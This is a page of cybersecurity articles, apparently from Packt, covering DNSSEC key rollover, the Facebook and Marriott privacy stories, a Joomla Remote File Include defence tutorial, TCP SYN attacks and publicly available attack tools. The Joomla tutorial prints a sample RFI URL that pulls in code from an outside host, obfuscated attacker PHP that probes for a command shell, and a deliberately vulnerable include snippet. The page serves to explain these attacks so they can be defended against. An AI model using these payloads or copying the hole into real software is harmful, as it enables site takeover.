
How-To Tutorials - Cybersecurity

89 Articles

RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Melisha Dsouza
05 Oct 2018
4 min read
On Thursday, October 11, 2018, at 16:00 UTC, ICANN will change the cryptographic key at the center of the DNS security system known as DNSSEC. The current key has been in place since July 15, 2010. This switch of the central security key for DNS is called the "Root Key Signing Key (KSK) Rollover". The replacement was originally planned for a year earlier, but the procedure was postponed because data suggested that a significant number of resolvers were not ready for the rollover. So the question is: are your systems prepared so that DNS will keep functioning for your networks?

DNSSEC is a system of digital signatures that prevents DNS spoofing. Maintaining an up-to-date KSK is essential to ensuring that DNSSEC-validating DNS resolvers continue to function following the rollover. If the KSK isn't up to date, DNSSEC-validating DNS resolvers will be unable to resolve any DNS queries. If the switch happens smoothly, users will not notice any visible changes and their systems will work as usual. However, if their DNS resolvers are not ready to use the new key, users may not be able to reach many websites! That said, there's good news for those who have been keeping up with recent DNS updates: since this rollover was delayed for almost a year, most DNS resolver software has been shipping with the new key for quite some time. If you have been keeping your systems up to date, they are all set for this change. If not, we've got you covered! But first, a quick background check.

As of today, the root zone is still signed by the old KSK with ID 19036, also called KSK-2010. The new KSK, with ID 20326, was published in the DNS in July 2017 and is called KSK-2017. KSK-2010 is currently used to sign itself, to sign the Root Zone Signing Key (ZSK), and to sign the new KSK-2017. The rollover only affects the KSK.
The ZSK is updated and replaced more frequently, without the need to update the trust anchor inside the resolver. (Source: Suse.com) You can watch ICANN's short video to understand all about the switch. Now that you understand the switch, let's go through the checks you need to perform.

#1 Check that you have the new DNSSEC Root Key installed

Ensure that the new DNSSEC root key, KSK-2017 with key ID 20326, is installed. To check this, look at the following locations:

- bind: /etc/named.root.key
- unbound / libunbound: /var/lib/unbound/root.key
- dnsmasq: /usr/share/dnsmasq/trust-anchors.conf
- knot-resolver: /etc/knot-resolver/root.keys

There is no need to restart your DNS service unless the server has been running for more than a year and does not support RFC 5011.

#2 Have a backup plan in case of unexpected problems

The RedHat team assures users that the probability of DNS issues is very low. In case you do encounter a problem, restart your DNS server and try a query such as dig . dnskey +dnssec. If all else fails, temporarily switch to a public DNS operator.

#3 Check for an incomplete RFC 5011 process

When the switch happens, containers or virtual machines that have old configuration files and new software will have only the soon-to-be-removed DNSSEC root key. This is logged via RFC 8145 to the root name servers, which provides ICANN with the statistics above. The server then updates the key via RFC 5011, but it may shut down before the 30-day hold timer has been reached. It can also happen that the hold timer is reached but the configuration file cannot be written to, or the file is written but the image is destroyed on shutdown/reboot, and the container restarts without the new key.
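The key IDs above (19036 for KSK-2010, 20326 for KSK-2017) are "key tags" computed from the DNSKEY record's wire-format RDATA using the checksum in RFC 4034 Appendix B. As a rough illustration (not part of RedHat's advisory), the computation can be sketched in Python; the sample bytes below are made up purely to show the arithmetic:

```python
def key_tag(rdata: bytes) -> int:
    """RFC 4034 Appendix B: 16-bit checksum over DNSKEY wire-format RDATA."""
    acc = 0
    for i, b in enumerate(rdata):
        acc += (b << 8) if i % 2 == 0 else b  # even-index bytes are high-order
    acc += (acc >> 16) & 0xFFFF               # fold the carry back in
    return acc & 0xFFFF

# Made-up RDATA; real RDATA is flags | protocol | algorithm | public key,
# e.g. as returned by `dig . DNSKEY`.
print(key_tag(bytes([1, 2, 3, 4])))  # 1030
```

Feeding in the actual wire-format RDATA of the root zone's KSK-2017 DNSKEY should yield 20326, which is how you can confirm which key a trust-anchor file contains.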
RedHat believes the switch of this cryptographic key will lead to an improved level of security and trust online. To know more about this rollover, head to RedHat's official blog.

What Google, RedHat, Oracle, and others announced at KubeCon + CloudNativeCon 2018
Google, IBM, RedHat and others launch Istio 1.0 service mesh for microservices
Red Hat infrastructure migration solution for proprietary and siloed infrastructure


Did you know Facebook shares the data you share with them for ‘security’ reasons with advertisers?

Natasha Mathur
28 Sep 2018
5 min read
Facebook is constantly under the spotlight these days when it comes to controversies regarding users' data and privacy. A new research paper published by Princeton University researchers states that Facebook shares the contact information you handed over for security purposes with its advertisers. The study was first brought to light by Gizmodo writer Kashmir Hill. "Facebook is not content to use the contact information you willingly put into your Facebook profile for advertising. It is also using contact information you handed over for security purposes and contact information you didn't hand over at all, but that was collected from other people's contact books, a hidden layer of details Facebook has about you that I've come to call 'shadow contact information'," writes Hill.

Facebook recently introduced a feature called custom audiences. Unlike traditional audiences, it allows the advertiser to target specific users: the advertiser uploads users' PII (personally identifiable information) to Facebook, Facebook matches the given PII against platform users, and then builds an audience of the matched users that the advertiser can track. Essentially, with Facebook, the holy grail of marketing, targeting an audience of one, is practically possible, never mind whether that audience wanted it or not. In today's world, social media platforms frequently collect various kinds of PII, including phone numbers, email addresses, names, and dates of birth. The majority of this PII is extremely accurate, unique, and verified user data. Because of this, these services have an incentive to exploit this personal information for other purposes, such as providing advertisers with more accurate audience targeting.
The paper, titled 'Investigating sources of PII used in Facebook's targeted advertising', is written by Giridhari Venkatadri, Elena Lucherini, Piotr Sapiezynski, and Alan Mislove. "In this paper, we focus on Facebook and investigate the sources of PII used for its PII-based targeted advertising feature. We develop a novel technique that uses Facebook's advertiser interface to check whether a given piece of PII can be used to target some Facebook user and use this technique to study how Facebook's advertising service obtains users' PII," reads the paper. The researchers developed a novel methodology for studying how Facebook obtains the PII it uses to provide custom audiences to advertisers. "We test whether PII that Facebook obtains through a variety of methods (e.g., directly from the user, from two-factor authentication services, etc.) is used for targeted advertising, whether any such use is clearly disclosed to users, and whether controls are provided to users to help them limit such use," the paper continues. The paper uses audience size estimates to study which sources of PII are used for PII-based targeted advertising. The researchers used this methodology to investigate which sources of PII Facebook actually uses for its PII-based targeted advertising platform. They also examined what information gets disclosed to users and what control users have over their PII.

What sources of PII are actually being used by Facebook?

The researchers found that Facebook allows its users to add contact information (email addresses and phone numbers) to their profiles. While any arbitrary email address or phone number can be added, it is not displayed to other users unless verified (through a confirmation email or confirmation SMS message, respectively). This is the most direct and explicit way of providing PII to advertisers.
The researchers then examined whether PII provided by users for security purposes, such as two-factor authentication (2FA) or login alerts, is used for targeted advertising. They added and verified a phone number for 2FA on one of the authors' accounts. The added phone number became targetable after 22 days, proving that a phone number provided for 2FA was indeed used for PII-based advertising, regardless of the privacy settings chosen.

What control do users have over PII?

Facebook lets users choose who can see each piece of PII listed on their profiles; the current general settings are: Public, Friends, Only Me. Users can also restrict the set of users who can search for them using their email address or phone number, with the options: Everyone, Friends of Friends, and Friends. Facebook provides users a list of advertisers who have included them in a custom audience using their contact information, and users can opt out of receiving ads from individual advertisers listed there. But information about which PII is used by which advertisers is not disclosed.

What information about how Facebook uses PII gets disclosed to the users?

When users add mobile phone numbers directly to their Facebook profile, no information about the uses of that number is directly disclosed to them; such information is disclosed only when adding a number from the Facebook website. As per the research results, there is very little disclosure to users, often in the form of generic statements that do not refer to the uses of the particular PII being collected or to the fact that it may be used to allow advertisers to target users. "Our paper highlights the need to further study the sources of PII used for advertising, and shows that more disclosure and transparency needs to be provided to the user," say the researchers in the paper. For more information, check out the official research paper.
Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma How far will Facebook go to fix what it broke: Democracy, Trust, Reality Mark Zuckerberg publishes Facebook manifesto for safeguarding against political interference


Marriott’s Starwood guest database faces a massive data breach affecting 500 million user data

Savia Lobo
03 Dec 2018
5 min read
Last week, the hospitality company Marriott International disclosed details of a massive data breach that exposed the personal and financial information of its customers. According to Marriott, the breach had been ongoing for the past four years and collected information about customers who made reservations in its Starwood subsidiary. The breached information included details of approximately 500 million guests. For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest ("SPG") account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.

The four-year-long breach that hit Marriott's customer data

On September 8, 2018, Marriott received an alert from an internal security tool reporting that attempts had been made to access the Starwood guest reservation database in the United States. Marriott then carried out an investigation, which revealed that its Starwood network had been accessed by attackers since 2014. According to Marriott's news center, "On November 19, 2018, the investigation determined that there was unauthorized access to the database, which contained guest information relating to reservations at Starwood properties on or before September 10, 2018." For some of the 500 million guests, the information includes payment card details such as numbers and expiration dates. However, "the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken."
"For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information," stated the Marriott news release. Arne Sorenson, Marriott's President and Chief Executive Officer, said, "We will continue to support the efforts of law enforcement and to work with leading security experts to improve. Finally, we are devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network." Marriott has also reported the incident to law enforcement and is notifying regulatory authorities.

This is not the first time Starwood data was breached

Marriott did not say exactly when in 2014 the breach began. However, its subsidiary Starwood revealed, a few days after being acquired by Marriott, that more than 50 of Starwood's properties had been breached, in November 2015. According to Starwood's disclosure at the time, that earlier breach stretched back at least one year, to November 2014. According to Krebs on Security, "Back in 2015, Starwood said the intrusion involved malicious software installed on cash registers at some of its resort restaurants, gift shops and other payment systems that were not part of its guest reservations or membership systems." In December 2016, KrebsOnSecurity stated that "banks were detecting a pattern of fraudulent transactions on credit cards that had one thing in common: They'd all been used during a short window of time at InterContinental Hotels Group (IHG) properties, including Holiday Inns and other popular chains across the United States." Marriott said that its own network was not affected by this four-year data breach and that the investigation only identified unauthorized access to the separate Starwood network.
"Marriott is providing its affected guests in the United States, Canada, and the United Kingdom a free year's worth of service from WebWatcher, one of several companies that advertise the ability to monitor the cybercrime underground for signs that the customer's personal information is being traded or sold," said Krebs on Security.

What should compromised users do?

As a defense measure, companies affected by a breach can pay threat hunters to look out for new intrusions, test their own networks and employees for weaknesses, and run drills to gauge their breach-response preparedness. Individuals who reuse the same password should try a password manager, which remembers strong passwords/passphrases and essentially lets you use one strong master password/passphrase across all websites. Krebs on Security's "assume you're compromised" philosophy "involves freezing your credit files with the major credit bureaus and regularly ordering free copies of your credit file from annualcreditreport.com to make sure nobody is monkeying with your credit (except you)." Rob Rosenberger, co-founder of Vmyths, tweeted advice to everyone who booked a room at a Starwood property since 2014 that affected users should change their mother's maiden name and social security number soon. https://twitter.com/vmyths/status/1069273409652224000 To know more about the Marriott breach in detail, visit Marriott's official website. Uber fined by British ICO and Dutch DPA for nearly $1.2m over a data breach from 2016 Dell reveals details on its recent security breach Twitter on the GDPR radar for refusing to provide a user his data due to 'disproportionate effort' involved


Preventing Remote File Includes Attack on your Joomla Websites

Packt
15 Oct 2009
7 min read
PHP is an open-source server-side scripting language. It is the basis of many web applications and works very nicely with platforms such as Joomla!. Since Joomla! is growing and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible; in my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has glaring holes, it won't be usable. Administrators and site developers have the next layer of responsibility: ensuring they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions. SQL injections, though very nasty, can be prevented in many cases; a Remote File Include (RFI) attack is more difficult to stop altogether, so it is important that you are aware of these attacks and know their signs.

Remote File Includes

An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that file-inclusion attacks such as these can mostly be mitigated by turning register_globals off. Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner:

http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?
If the site in this example did not have appropriate safeguards in place, the following code would be executed: $x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72"; echo "c162141156kx5fr157cx6bs";if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){ echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit(); ?> This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another: {echo "345a146x65155od145x3ao156";}else{ echo "345a146ex6dox64e:x6ffx66";}exit(); Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C><H1>Changing this CMD will result in corrupt scanning !</H1></html></head></body><?phpif((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{ini_restore("safe_mode");ini_restore("open_basedir");if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{echo("Safe Mode of this Server is : ");echo("SafemodeON");}}...@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}exit; This sanitized example wants to learn if we are running SAFE MODE on or off, and then would attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a Command Shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt". 
Other methods of attack include the following:

- Evil code uploaded through session files or through image uploads.
- Insertion or placement of code you might think would be safe, such as compressed audio streams. These do not get inspected as they should be and can allow access to remote resources. Notably, this can slip past even if you have set allow_url_fopen or allow_url_include to disabled.
- Taking input from the request POST data instead of a data file.

There are several other methods beyond this list, and judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for robust security architecture, and for being very careful in accepting user input on our websites.

The Most Basic Attempt

You don't always need heavy or fancy code as in the earlier examples; just appending a page request of sorts to the end of our URL will do it. Remember this?

/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?

Here we're instructing the server to force our path to change in our environment to match the code located out there. Here is such a "shell":

<?php $file = $_GET['evil-page']; include($file . ".php"); ?>

What Can We Do to Stop This?

As stated repeatedly, defense in depth is the most important design consideration. Putting up many layers of defense will enable you to withstand attacks. This type of attack can be defended against at the .htaccess level and by filtering inputs. One problem is that we tend to forget that many PHP defaults set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask.
If enabled, this allows PHP file functions such as file_get_contents(), and the ever-present include and require statements, to work in a manner you may not have anticipated, such as retrieving the entire contents of your website or allowing a determined attacker to break in. Programmers sometimes forget to do proper input filtering on user fields, such as an input box that accepts any type of data, allowing code to be inserted for an injection attack. Many site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples.

Make sure you keep register_globals OFF. This is a biggie that will prevent much evil! There are a few ways to do this, and they are handled differently depending on your version of Joomla!. In Joomla! versions earlier than 1.0.13, look for this code in globals.php:

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

/*
 * Use 1 to emulate register_globals = on
 * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY
 * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED
 *
 * Use 0 to emulate register_globals = off
 * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY
 * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS
 */
define( 'RG_EMULATION', 0 );

Make sure RG_EMULATION is set to zero (0) instead of one (1); out of the box it is 1, meaning register_globals is on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION | SERVER tab. Have you upgraded from an earlier version of Joomla!? Affects: Joomla! 1.0.13—1.0.14
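Beyond the configuration fixes above, the $_GET['evil-page'] pattern shown earlier is best neutralized with a whitelist: never pass user input to include(); look it up in a fixed map instead. Here is a language-neutral sketch of that idea in Python (the page names and paths are made up for illustration):

```python
# Hypothetical page map, for illustration; the Joomla!-specific fix is the
# RG_EMULATION / register_globals setting described above.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "about": "pages/about.php",
}
DEFAULT_PAGE = ALLOWED_PAGES["home"]

def resolve_page(user_input: str) -> str:
    # Look the request up in a fixed whitelist; attacker-controlled values
    # such as a remote URL never reach the include/require step.
    return ALLOWED_PAGES.get(user_input, DEFAULT_PAGE)

print(resolve_page("about"))                                # pages/about.php
print(resolve_page("http://www.forum.com/update/xxxxx/i"))  # pages/home.php
```

Because only values already present in the map can ever be returned, a crafted URL degrades to the default page instead of pulling in remote code.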


Bloomberg's Big Hack Exposé says China had microchips on servers for covert surveillance of Big Tech and Big Brother; Big Tech deny supply chain compromise

Savia Lobo
05 Oct 2018
4 min read
According to an in-depth report published by Bloomberg yesterday, Chinese spies secretly inserted microchips into servers used by Apple, Amazon, the US Department of Defense, the Central Intelligence Agency, and the Navy, among others.

What did Bloomberg's Big Hack Exposé reveal?

The tiny chips were made to be undetectable without specialist equipment and were implanted onto the motherboards of servers on the production line in China. These servers were allegedly assembled by Super Micro Computer Inc., a San Jose-based company that is one of the world's biggest suppliers of server motherboards. Supermicro's customers include Elemental Technologies, a streaming-services startup that was acquired by Amazon in 2015 and provided the foundation for the expansion of the Amazon Prime Video platform. According to the report, the Chinese People's Liberation Army (PLA) planted the illicit chips on hardware during the manufacture of server systems in factories.

How did Amazon detect these microchips?

In late 2015, Elemental's staff boxed up several servers and sent them to Ontario, Canada, for a third-party security company to test. The testers found a tiny microchip, not much bigger than a grain of rice, nested on the servers' motherboards, that wasn't part of the boards' original design. Amazon reported the discovery to U.S. authorities, which shocked the intelligence community, because Elemental's servers are ubiquitous across key US government agencies, from Department of Defense data centers to the CIA's drone operations and the onboard networks of Navy warships. And Elemental was just one of hundreds of Supermicro customers. According to the Bloomberg report, "The chips were reportedly built to be as inconspicuous as possible and to mimic signal conditioning couplers."
It was determined during an investigation, which took three years to conclude, that the chip "allowed the attackers to create a stealth doorway into any network that included the altered machines." The report claims Amazon became aware of the attack during its move to purchase the streaming-video compression firm Elemental Technologies in 2015. Elemental's services appear to have been an ideal target for Chinese state-sponsored attackers to conduct covert surveillance. According to Bloomberg, Apple was also a victim of the apparent breach: Bloomberg says Apple found the malicious chips in 2015 and subsequently cut ties with Supermicro in 2016.

Amazon, Apple, and Supermicro deny supply chain compromise

Amazon and Apple have both strongly denied the results of the investigation. Amazon said, "It's untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental. It's also untrue that AWS knew about servers containing malicious chips or modifications in data centers based in China, or that AWS worked with the FBI to investigate or provide data about malicious hardware." Apple affirms that internal investigations were conducted in response to Bloomberg's queries and that no evidence was found to support the accusations. The only infected driver was discovered in 2016 on a single Supermicro server in Apple Labs; that incident may have led to the severed business relationship in 2016, rather than the discovery of malicious chips or a widespread supply-chain attack. Supermicro confirms that it was not aware of any investigation regarding the topic, nor was it contacted by any government agency in this regard. Bloomberg says the denials are in direct contrast to the testimony of six current and former national security officials, as well as confirmation by 17 anonymous sources who said the account of the Supermicro compromise was accurate.
Bloomberg's investigation has not been confirmed on the record by the FBI. To know about this news in detail, visit Bloomberg News. “Intel ME has a Manufacturing Mode vulnerability, and even giant manufacturers like Apple are not immune,” say researchers Amazon increases the minimum wage of all employees in the US and UK Bloomberg says Google, Mastercard covertly track customers’ offline retail habits via a secret million dollar ad deal


Telecommunications and Network Security Concepts for CISSP Exam

Packt
28 Oct 2009
5 min read
Transport layer

The transport layer in the TCP/IP model does two things: it packages the data handed down by applications into a format suitable for transport over the network, and it unpacks data received from the network into a format suitable for applications. The process of packaging the data packets received from applications is known as encapsulation, and the output of that process is known as a datagram. Similarly, the process of unpacking a datagram received from the network is known as abstraction. A transport section in a protocol stack carries information in the form of datagrams, frames, and bits.

Transport layer protocols

There are many protocols that carry out transport layer functions. The most important ones are:

- Transmission Control Protocol (TCP): a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol.
- User Datagram Protocol (UDP): similar to TCP, but connectionless.

A connection-oriented protocol guarantees delivery of datagrams (packets) to the destination application by way of a suitable mechanism, for example the three-way handshake (SYN, SYN-ACK, ACK) in TCP. The reliability of datagram delivery with such protocols is high. A protocol that does not guarantee delivery of datagrams, or packets, to the destination is known as a connectionless protocol. These protocols use only one-way communication, and their datagram delivery is fast.

Other transport layer protocols are as follows:

- Sequenced Packet eXchange (SPX): part of the IPX/SPX protocol suite, used in the Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol.
- Stream Control Transmission Protocol (SCTP): a connection-oriented protocol similar to TCP, but providing facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems.
- AppleTalk Transaction Protocol (ATP): a proprietary protocol developed for Apple Macintosh computers.
- Datagram Congestion Control Protocol (DCCP): as the name implies, a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network.
- Fibre Channel Protocol (FCP): used in high-speed networking such as Gigabit networking. One of its prominent applications is the Storage Area Network (SAN). A SAN is a network architecture used for attaching remote storage devices such as tape drives and disk arrays to a local server, so that the storage devices can be used as if they were local.

In the following sections we'll review the most important protocols: TCP and UDP.

Transmission Control Protocol (TCP)

TCP is a connection-oriented protocol that is widely used in Internet communications. TCP has two primary functions: the primary function is the transmission of datagrams between applications, while the secondary function is the set of controls necessary for ensuring reliable transmissions.

Protocol / Service: Transmission Control Protocol (TCP)
Layer(s): Transport layer of the TCP/IP model
Applications: Applications where delivery must be assured, such as email, the World Wide Web (WWW), and file transfer
Threats: Service disruption
Vulnerabilities: Half-open connections
Attacks: Denial-of-service attacks such as TCP SYN attacks; connection hijacking such as IP spoofing attacks
Countermeasures: SYN cookies; cryptographic solutions

A half-open connection is a vulnerability in TCP implementations.
TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration:

In a three-way handshake, the client (workstation) first sends a request to the server (www.some_website.com). This is known as a SYN request. The server acknowledges the request by sending SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery.

If the client does not send the final ACK, the connection is known as half-open. Since the server has created a buffer for that connection, a certain amount of memory or server resources is consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed, resulting in a denial-of-service to legitimate requests. TCP SYN attacks work by establishing thousands of half-open connections to consume the server resources. An attacker can take two approaches:

The attacker, or malicious software, sends thousands of SYNs to the server and withholds the ACKs. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, over a span of time the entire resources will be consumed, resulting in a denial-of-service.

If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing.

SYN attacks, such as SYN flooding and SYN spoofing, can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. Instead, the server creates a cookie with a computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, and sends it as the SYN-ACK.
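A minimal sketch of the SYN cookie idea follows. The hash inputs mirror the description above (connection 4-tuple plus a server-side secret); the exact algorithm used by real TCP stacks differs, and `SECRET` is a made-up value for illustration:

```python
import hashlib

SECRET = b"server-side-random-secret"  # hypothetical per-server secret value

def syn_cookie(src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> int:
    """Derive a 32-bit cookie from the connection 4-tuple plus a secret.

    The server sends this value in the SYN-ACK instead of allocating
    a connection buffer, so half-open connections cost it nothing."""
    data = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}".encode() + SECRET
    return int.from_bytes(hashlib.sha256(data).digest()[:4], "big")

def verify_cookie(cookie: int, src_ip: str, src_port: int,
                  dst_ip: str, dst_port: int) -> bool:
    """On the final ACK, recompute the cookie; only on a match is the
    connection state actually created."""
    return cookie == syn_cookie(src_ip, src_port, dst_ip, dst_port)

c = syn_cookie("10.0.0.5", 40000, "192.0.2.1", 80)
print(verify_cookie(c, "10.0.0.5", 40000, "192.0.2.1", 80))  # True
```

Because the server stores nothing until a valid ACK arrives, flooding it with SYNs no longer exhausts its connection buffers.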
When the server receives an ACK, it checks the details and only then creates the connection.

A cookie is a piece of information, usually in the form of a text file, sent by the server to a client. Cookies are generally stored on the client's computer and are used for purposes such as authentication, session tracking, and management.

User Datagram Protocol (UDP)

UDP is a connectionless protocol similar to TCP. However, UDP does not guarantee the delivery of data packets.
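The connectionless nature of UDP is easy to see with the standard socket API: a datagram is simply sent, with no handshake and no delivery acknowledgement. A minimal loopback sketch:

```python
import socket

# Receiver: bind a UDP socket to an ephemeral loopback port.
recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind(("127.0.0.1", 0))
port = recv_sock.getsockname()[1]

# Sender: no connect(), no handshake -- just fire the datagram.
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
send_sock.sendto(b"hello over UDP", ("127.0.0.1", port))

data, addr = recv_sock.recvfrom(1024)
print(data)  # b'hello over UDP'
send_sock.close()
recv_sock.close()
```

Over the loopback interface this datagram will arrive, but nothing in the protocol guarantees it: on a congested network the packet could simply be dropped, and neither side would be told.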
5 nation joint Activity Alert Report finds most threat actors use publicly available tools for cyber attacks

Melisha Dsouza
12 Oct 2018
4 min read
NCCIC, in collaboration with the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States, has released a joint 'Activity Alert Report'. This report highlights five publicly available tools frequently observed in cyber attacks worldwide.

Today, malicious tools are freely available and can be misused by cybercriminals to endanger public security and privacy. Numerous cyber incidents are encountered on a daily basis that challenge even the most secure networks and expose confidential information across the finance, government, and health sectors. What's surprising is that a majority of these exploits are carried out with freely available tools that find loopholes in security systems to achieve an attacker's objectives. The report highlights the five tools most frequently used by cybercriminals all over the globe. These fall into five categories:

#1 Remote Access Trojan: JBiFrost

Once the RAT program is installed on a victim's machine, it allows remote administrative control of the system. It can then be used to exploit the system as per the hacker's objectives, for example, installing malicious backdoors to obtain confidential data. RATs are often difficult to detect because they are designed not to appear in lists of running programs and to mimic the behavior of legitimate applications. RATs can also disable network analysis tools (e.g., Wireshark) on the victim's system. The Windows, Linux, Mac OS X, and Android operating systems are all susceptible to this threat.

Hackers spammed companies with emails to infiltrate their systems with the Adwind RAT. The entire story can be found on Symantec's blog.

#2 Webshell: China Chopper

China Chopper has been used widely since 2012. Webshells are malicious scripts that are uploaded to a target system to grant the hacker remote access to administrative capabilities on the system.
The hackers can then pivot to additional hosts within a network. China Chopper consists of the client side, which is run by the attacker, and the server side, which is installed on the victim server and is also attacker-controlled. The client can issue terminal commands and manage files on the victim server. It can upload and download files to and from the victim using wget, and can then either modify or delete the existing files.

#3 Credential Stealer: Mimikatz

Mimikatz is mainly used by attackers to access the memory of a targeted Windows system and collect the credentials of logged-in users. These credentials can then be used to gain access to other machines on a network. Besides obtaining credentials, the tool can obtain LAN Manager and NT LAN Manager hashes, certificates, and long-term keys on Windows XP (2003) through Windows 8.1 (2012r2). When the "Invoke-Mimikatz" PowerShell script is used to operate Mimikatz, its activity is difficult to isolate and identify.

In 2017, this tool, used in combination with NotPetya, infected hundreds of computers in Russia and Ukraine. The attack paralysed systems and disabled the subway payment systems. The good news is that Mimikatz can be detected by most up-to-date antivirus tools. That being said, hackers can modify Mimikatz code to go undetected by antivirus.

#4 Lateral Movement Framework: PowerShell Empire

PowerShell Empire is a post-exploitation or lateral movement tool. It allows an attacker to move around a network after gaining initial access. This tool can be used to generate executables for social engineering access to networks. With it, a threat actor can escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network. Traditional antivirus tools fail to detect PowerShell Empire.
In 2018, the tool was used by hackers sending out Winter Olympics-themed socially engineered emails and malicious attachments in a spear-phishing campaign targeting several South Korean organizations.

#5 C2 Obfuscation and Exfiltration: HUC Packet Transmitter

HUC Packet Transmitter (HTran) is a proxy tool used by attackers to obfuscate their location. The tool intercepts and redirects Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it difficult to detect an attacker's communications with victim networks. A threat actor uses HTran to facilitate TCP connections between the victim and a hop point. Threat actors can then redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network.

The researchers encourage everyone to use the report to stay informed about the potential network threats posed by these malicious tools. They also provide a complete list of detection and prevention measures for each tool in detail. You can head over to the official site of US-CERT for more information on this research.

6 artificial intelligence cybersecurity tools you need to know

How will AI impact job roles in Cybersecurity

New cybersecurity threats posed by artificial intelligence
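At its core, this kind of proxying is just reading bytes from one TCP connection and writing them to another. The sketch below is an illustrative single-request forwarder (not HTran itself, and far simpler): the "operator" talks only to the proxy, and the destination server only ever sees the proxy's address:

```python
import socket
import threading

def serve_echo(srv: socket.socket) -> None:
    """Toy destination server: echo one message back to the caller."""
    conn, _ = srv.accept()
    conn.sendall(conn.recv(4096))
    conn.close()

def serve_proxy(srv: socket.socket, target: tuple) -> None:
    """Relay one connection: the destination sees the proxy's address,
    not the true origin of the traffic."""
    client, _ = srv.accept()
    upstream = socket.create_connection(target)
    upstream.sendall(client.recv(4096))       # forward the request
    client.sendall(upstream.recv(4096))       # forward the reply back
    upstream.close()
    client.close()

def listener() -> socket.socket:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))                  # port 0: pick any free port
    s.listen(1)
    return s

echo_srv, proxy_srv = listener(), listener()
threading.Thread(target=serve_echo, args=(echo_srv,)).start()
threading.Thread(target=serve_proxy,
                 args=(proxy_srv, echo_srv.getsockname())).start()

# The "operator" connects only to the proxy hop.
op = socket.create_connection(proxy_srv.getsockname())
op.sendall(b"probe")
reply = op.recv(4096)
print(reply)  # b'probe'
op.close()
```

Chaining several such hops is what lets a threat actor hide the origin of their traffic, which is also why defenders look for unexpected relay behaviour on internal hosts.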

Booting the System

Packt
27 Feb 2015
12 min read
In this article by William Confer and William Roberts, authors of the book Exploring SE for Android, we will see how, once we have an SE for Android system, we can make use of it and get it into a usable state. In this article, we will:

Modify the log level to gain more details while debugging

Follow the boot process relative to the policy loader

Investigate SELinux APIs and SELinuxFS

Correct issues with the maximum policy version number

